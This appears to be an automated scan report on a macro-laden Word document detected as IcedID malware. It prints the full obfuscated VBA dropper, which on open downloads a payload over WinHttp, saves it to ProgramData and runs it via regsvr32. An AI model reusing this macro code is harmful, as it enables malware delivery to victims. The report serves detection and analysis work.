MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set kKojH = CreateObject(UkVhf + "." + "shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set MbaLK = VBA.CreateObject(fJYHb + "" + QUlHO) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13482 bytes |
SHA-256: f45171d8bb5800fee71ff90ffd91ebd90add1bd4c126fff60315d0eee8dcf6df |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "XPtmE"
Sub WMEez(rARfq, Optional ByVal IMvqe As String = "c:\programdata\IhnSO.txt", Optional ByVal QUlHO As String = "systemobject")
' Multinational cluck calibrates importantly
' Thunderously
' Prizing
' Missy enliven tactic
' Wordplay backstabbing foreigners
' Tray tearoom wanting gorse recalls hopelessness
' Densities splayed cues
' Sanctioning telepathic retrievable
' Geneticists croaks
' Inextricable sachet encircling antiquaries
' Percolates grandmaster downwards major
' Palatal itemised exigency
' Bawdy pathologically lucre
' Prostrates infants contend itchy
' Matrimonially merchantable transfused actuating toughs bizarreness
' Bailed cursorily
' Donned hypothetically ascorbic childproof
' Matt seminar epoxy endured mischief
' Cart carter element
' Architectures decrypted tedious hysteria
' Expectantly
' Uncrossable unconstitutionally ballpens donors
' Alcohol kongo heartiness pictorially
' Haul catered microfilming satsumas
Set MbaLK = VBA.CreateObject(fJYHb + "" + QUlHO)
' Ingesting bejewel
' Floppiest spilled
' Premiums veneers
' Select combustion
' Menarche righthander opened polyethylene slimmers seductiveness
' Opalescent
' Chaperoned reductions incorporated
Set KZOmR = MbaLK.CreateTextFile(IMvqe)
' Mount motherofpearl uncompressed scintillated
' Blips silica
' Brewers underlined eavesdropper garble
' Scalability
KZOmR.WriteLine rARfq
' Quarried actuator stampede generalist telephony
' Abut alliterating kismet question
' Pubs availabilities flossing heathenish
' Specimen stilling
' Savagery indictment equably quilt
' Hypnotising vets beeches lasted
KZOmR.Close
' Fratricidal shipment bibliographies
' Uncertainties jockeys assignment gunning apologetic concurs
' Fork
' Reciprocated stark hermit nonevent
' Exert reserver
' Hyacinth tragedians
' Glooms significantly
' Vinyl sculptured footings
' Pitcher deriders spraining apertures uncomely
' Lingua grossly
' Eldest motherstobe smallholder shivers
' Ribosome idler dodecahedral
' Unlicensed expropriate
' Voltmeter irresistible whenever tearing
' Couch defensively demonology
' Trackbed boned muchness cogs emigrate actuality
' Unwed agreeably
' Hemisphere cranial stockbrokers innovative lightship supreme eardrum
' Wittiness wealthiest cartload involvement liberality uncatalogued
' Cautiousness dementedly interceptor deserted
' Whiling articulation sheepskins imagines
' Diaphragmatic keynote indomitable sinned
' Studios
' Slacks feminists elevations
' Adulterates anticipatory coding
' Delimit
' Betokens
' Blurbs matrix
' Familial kilts gyromagnetic relined
' Weighty
' Floury
' Itemised darker
' Interchangeably hibernation
' Preponderantly millet
' Kindlier vines
' Cableway
' Apt wheezing manhole fatness securer mooted
' Purified underprivileged
' Ductile lending
' Hire shipload hippie chomped raffles stonemason
End Sub
' Triumphs moderner putrefying constable
' Spice diversions
' Provocatively conceptualised
' Bedsteads narrower
' Boardrooms emergent radially
Sub AutoOpen()
' Anus straitjackets peels crock
' Deputes meters snuggled
' Sonsinlaw aides midmost mutineers
' Vigorously
' Graduand condenser smart ditty tablespoons
' Polling gauche favourable ethylene
' Chandeliers inquests rapping clink
' Existentialist shrapnel profaneness
' Rejections addiction fullmoon throwback discussion
' Discounting outplacement astrolabe ferreted regarding alkaline alto
' Bigness combination coastguard
' Eritrea handsomeness
' Overturn dismissal mowing boneless
' Roughshod groups tidbit arousal lavatorial
' Umbra beholder
' Perinatal covenants tangential comforted
' Clowning spay initiators
' Martens quash
' Drunker evaders
' Grants cheesemaking awash
' Monday worthiest anaesthetists
' Funk dieted prying
' Grandpa moreover
' Credits retreated impresario
' Molarities disparagingly permuted
' Orbiting
' Illegality pertinent
' Damnify spectrophotometry nullifying rankled
Dim Mhkng As New IfIHh
' Clinically harbours
' Anoints anticyclone columnists
' Gibed samosas forestalled phrenology
' Firework positivity lesotho mayonnaise
ZcDrt = ""
' Awe archiving
' Plunged isolators shared quadrature
' Reasons droopingly bleated sullenly
' Gratify armbands buttonhole sycophantically
' Flier dowsers served
' Dive fascination chamberpots
' Best malt
' Seriously narcoleptic automation foolish
' Midfielder recessions clam treachery
rARfq = Mhkng.HqGfq(bkQTc)
' Porterage masquerades
' Alphabet positivist invariably
' Fiddle predictions neurological protea
' Aback honourable agleam unimaginatively
WMEez aHBvM(rARfq)
' Embellishments
' Pneumatics famished victories dumbness
' Pelicans excellency amusingly
' Precaution inconveniencing
' Mainframes physiologist mismatch skydive
' Demurely
' Silly fulltimer commodore pitons
' Unpicking shorted sneeze criminalised designable
' Mambas
' Unknowable
MILHj fsxAY(0) + "vr32 c:\programdata\IhnSO.txt", "wscript"
End Sub
Function Tilhj(kSEcN, jbCny)
' Edgings miner counterrevolutionary
' Commissioned fritters locomotive bleach
' Vintage governess wisp
' Unenthusiastically
' Dickens drought
' Holsters harbours squared
Tilhj = Split(kSEcN, jbCny)
End Function
Attribute VB_Name = "igdAD"
' Dieted
' Psycho
' Monsieur rinds cows reluctantly
' Blackjack voices disliked wager
' Embezzle nutty
Function aHBvM(gFLnO)
' Sixths taxed deadness fare
' Optimally processed
' Treetops havana oinks rationalists
' Crimping haunted typesetter kelts degas
' Revisable
' Brotherinlaw cadet directionally pence
' Sprinkle swaps ensemble pyroxene
aHBvM = StrConv(gFLnO, vbUnicode)
' Analytically billboard egotistically insincerely
' Anticipates slanderous harmonic itemised
' Dizzy discernment
' Buoy commission hedonism separability blazers husbandman submersion
End Function
' Raves oldmaids innovatively inexact louse
' Biases burdock luckily materials
' Ridiculous cane
' Leitmotif ensnaring wrest unreconstructed decreasing
' Stovepipe perspicuity plughole
' Terrified avowing
' Template concentric inflowing gasworks
' Inventiveness macromolecules germ
Function BBwPl()
' Unmaintainable beadyeyed sot collude inefficiencies conserve
' Windows graters nyala
' Teddies oafs
' Fended hundredths perhaps
' Unwrap roadster constantly nosey
' Washed celebrated listed yelped
' Nightdresses composites whirring
' Grabber overcompensate strategically crimped thievish accusingly
' Breweries congeals floggers
' Suffragettes yearned artier
' Cashew balderdash
' Dessicated evocatively voyaged
With ActiveDocument.shapes(1)
BBwPl = .AlternativeText
End With
End Function
' Accurate
' Paratroopers swad enlarging grapefruit girths
' Welldefined saudis jerkings unmeasurable
' Node comprise matt
' Fitment snappily
' Elk thence procurable kenyan
Function fsxAY(MVkgW)
' Freefalling ovulation antipathies hatches
' Initialising snuggled babas
' Beta augment wider
' Trappable unconditional polluted crawler
' Phonologically indicant
' Cookery blond ticketed physiologically retry
' Inefficiencies infers arrestable deceptions bunkum
' Securest manageable resorts
' Relied waste demounting girded ionise
' Meetings villains
JbjMR = Tilhj(BBwPl(), "~~~")
oFEtk = JbjMR(MVkgW)
fsxAY = oFEtk
End Function
Attribute VB_Name = "IfIHh"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function gSzet(hIaGn, Ozzce, LHDhn)
' Solidified distrust
' Doctrinal
' Grooving subdivision revolted futurism
' Sidestepped carbolic sunflowers shared exempts
' Slobbering will
gSzet = Mid(hIaGn, Ozzce, LHDhn)
End Function
Public Function ObyTP(VoYjQ, UmoHb)
' Fruited lavishes guarantee
' Witchdoctors countries website
' Dative hellish dosed centigrade insalubrious subsided
' Electromagnetically looter
' Enhanced taverna
' Chomped menus ingrown
' Lurks deepen spearheads puppet
' Levelheaded suppose mortice campaigns
' Animate inhumanly remount
' Amenities
' Skim god basks
' Monkey breeches garnished
' Egomaniac electrode
' Demonstration
' Libations intersection
' Brothels delirious glazier recommissioning annex turnips
TOsgC = Trim(VoYjQ)
For sOvMR = UmoHb To Len(TOsgC)
hfapK = gSzet(TOsgC, sOvMR, UmoHb) & hfapK
Next sOvMR
ObyTP = hfapK
End Function
' Hydrated piglets fixation
' Pips burped
' Leek catchment pitiably blundering
' Scorn wobble soothes
' Exceeded providentially intramural
Function HqGfq(ejzMY)
' Chimney pressures mustang
' Divorced patination judiciously stagings
' Shambles arthur debauched
' Gyms pastels popularisations signify
' Lepers stamped snoozes iteration daughter
' Cavorts interdepartmental macintosh clonal
Dim MkiWV As Object
' Harlequin unfussy
' Aphorisms
' Definite revisionary seattle lamplight pooh largeness
' Flowery muscles taxing shrewder
' Silhouettes treeless cellulose connect
' Weak haddock
' Hallucinating
' Narration cor dustily
' Exceptionable population
' Landladies paternalistic domiciliary grafting clinging
' Relents healthiest
Set MkiWV = CreateObject(ObyTP(ejzMY, 1) + "." + ObyTP(ejzMY, 1) + "Request.5.1")
' Queued
' Ensue
' Monolayer unsupportable raisins huffing
' Writhes ignoble doorstop
' Sinecure rely showing
' Leak keyboard
' Wright excels savers perdition radiography
' Weans codifying wetly werewolf preparer
' Troupes
' Squatting fastidious valour
' Boulder overdid intestate immolate
' Courtesans delimiters crayfish
' Tattooed wrathful
' Rename churchmen clenched shouldering
' Narrating precondition aggressor purposed
' Premeditated risque purls disambiguate rebutting innumerable
' Impeccably menaced unconvincing retaliating
' Kalif jadedness pinched
' Handsomer seagoing messiah configuring
' Microwaved paragraphs professions foremost blur frustrates bavaria
' Debarred
' Adjudged oddment shortcut ween
' Amputate crowns
' Mutinous demonise deputise wellused weightlessly
jDNBy = fsxAY(1)
' Prevailed advises murray bastard thoughtfully
' Intoxicating whale girt pimping
' Cosmological pizzas
' Slates should reverberant oppression
' Selfcentred manoeuvring showpieces filet
' Subtending allies renaissance misname
' Righten likening bigheads
MkiWV.Open "GET", ObyTP(jDNBy, 1), False
' Groomer competency infest buts usage meaningfulness
' Aldermen cigar
' Preselect malicious mutated legibly hover communiques lubricants
' Rationalism wiling pamphlets linkages
MkiWV.Send
' Lobbing languidly
' Enticing brandishes
' Exempting chimpanzees
' Endgame infarction
' Prettier shushed checkouts lavished phenomenon sward
' Susceptible maims predictor bimonthly
HqGfq = MkiWV.responsebody
End Function
Attribute VB_Name = "TOFkI"
Public Const bkQTc As String = "ptthniw"
Public Const fJYHb As String = "scripting.file"
Sub MILHj(NvFMZ, UkVhf)
' Nettles underprivileged
' Levitation prior
' Archetypes wails indent defrauds
' Doctrinaire gonorrhoea fits diva gradation
Set kKojH = CreateObject(UkVhf + "." + "shell")
' Kidnapping calmed boxer vegetive beginners
' Sunspot trainers pourable
' Condensed industrial receivable engraving cramming
' Eyewitnesses
' Piano subconsciously pretexts stairway brother
' Jeep postscript guess robotic
' Shirked immaculately repositions brinkmanship
' Exhalations psychotherapists seafront
' Indiscretion trap
' Earsplitting
' Sufferings signposts twinkling jaunting
' Felons dissected unshaven
' Ancestry slimming falling
' Furtively hummed
' Verdant flanker cedars
' Pate freestyle
' Disbelievingly asceticism
' Wireless
' Plazas nudging hairless otherness deny
' Transmigration
' Ndebele juniors grouses
' Porridge shellac defeatism clanging
' Awesomely blasphemer semidetached
' Chortle softening acknowledgement cruelest
' Darkness paleness attuned rinsed spilled
' Surfeit afternoons sprints behoves mustering
' Discs embrasure closers
' Overturned town patchable stranglehold deed dormer
' Procreatory slobber shutting liaise
' Favourites moulded pantaloons correctable
' Reinvestigation hewed
' Disassembles wants
' Fund hid prayerful breasted
' Unsubsidised reimplemented spirited
' Counterbalanced touchdowns titfortat
' Hairstyle naive gaul guidebooks
' Petrifying
' Dances trawler
' Implausibly complexities
' Jeerings dull egotistic dearie resonates lyon
' Unclenching developer porns chilliness
' Percepts claps monarchy strive
' Gunfires trunnion etudes cockerels adjudges scrubs
' Poliomyelitis debutants decaffeinate bipartite exorcisms grisly
' Maleness doped overflows greenly hostelry loathsomely
' Disassembler embodiments examiners
Call kKojH.exec(NvFMZ)
' Hedges countered
' Xhosas vacancies
' Cease purposelessly interchangeable interactional harmfully sallies parks alkalis
' Snuffbox disorder
' Whites previous overexposed appeased manipulator
' Legion fist chronicles grading poster shying
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 49152 bytes |
SHA-256: 9b1525a1b412aa9bb4cf03d5a226257431a1cc60cfc57bfc5f596b12994b1de9 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.